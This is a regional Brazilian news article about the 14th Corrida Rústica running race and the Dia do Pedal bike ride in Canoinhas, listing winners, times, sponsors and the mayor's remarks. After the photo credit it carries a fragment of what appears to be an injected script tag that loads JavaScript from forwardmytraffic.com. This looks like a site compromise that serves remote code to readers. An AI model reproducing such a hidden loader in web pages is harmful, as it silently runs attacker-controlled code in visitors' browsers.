InícioCidadeMais de mil pessoas participam da Corrida Rústica e do Dia do...

Mais de mil pessoas participam da Corrida Rústica e do Dia do Pedal em Canoinhas.

Últimas notícias

Operação contra abuso sexual em Canoinhas e Papanduva é considerada a maior da região

A operaçãoRespectus, deflagrada nesta quarta-feira (24) em Papanduva e...

Após denúncia polícia militar apreende arma sem registro em Três Barras

Na quarta-feira, 24, por volta das 16h, policiais militares...

O feriado do Dia do Trabalhador foi marcado por atividades esportivas e de lazer em Canoinhas. Mais de mil pessoas participaram da 14ª Corrida Rústica e do Dia do Pedal. “Este ano tivemos recorde de inscritos na corrida”, comenta o gestor da Fundação Municipal de Esportes e Lazer (FMEL), Jocimar Jubanski. Cerca de 300 pessoas competiram.

 

José Wagner Santos de Farias foi o primeiro a cruzar a linha de chegada aos 26 minutos e 11 segundos (foto). Volnei Pires foi o segundo com a diferença de cinco segundos. Marcelo de Lima foi o terceiro aos 26:35.

A Corrida Rústica, que teve o percurso de sete quilômetros, é evento promovido pelo Governo do Município de Canoinhas, por meio da FMEL, em parceria com Serviço Social do Comércio (Sesc), Serviço Nacional de Aprendizagem Comercial (Senac) e com o Serviço Social da Indústria (Sesi).

 

Entre as mulheres, Juliana Trapp foi a primeira a chegar aos 31 minutos e 27 segundos (foto acima). Luciane Schwarz conseguiu o segundo melhor tempo (32:53) e Paula Carolina Paul Tremel o terceiro (foto abaixo) (34:06).

 

 

O resultado das 12 categorias é possível conferir no site http://www.chiprun.com.br/. As fotos da competição estarão disponíveis a partir desta quarta-feira, 2, no Facebook da Prefeitura de Canoinhas.

 

Mais de 700 pessoas participaram do passeio ciclístico que teve sorteio de bikes ao final. O Dia do Pedal é promoção do Sesc em parceria com o Município e outras entidades.

 

“Ao ver tantas famílias participando destes eventos tenho a certeza de que o dever foi cumprido da melhor maneira possível levando atividade esportiva e de lazer para todas as idades”, comentou o prefeito Beto Passos. Vice-prefeito Renato Pike também participou do passeio ao lado da família. “Sempre que possível estamos oferecendo oportunidades de lazer que fortalecem os laços com a nossa família”.

 

fonte: http://www.pmc.sc.gov.br/noticias/index/ver/codNoticia/484714/codMapaItem/18101

Imagens: Priscila Noernberg… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.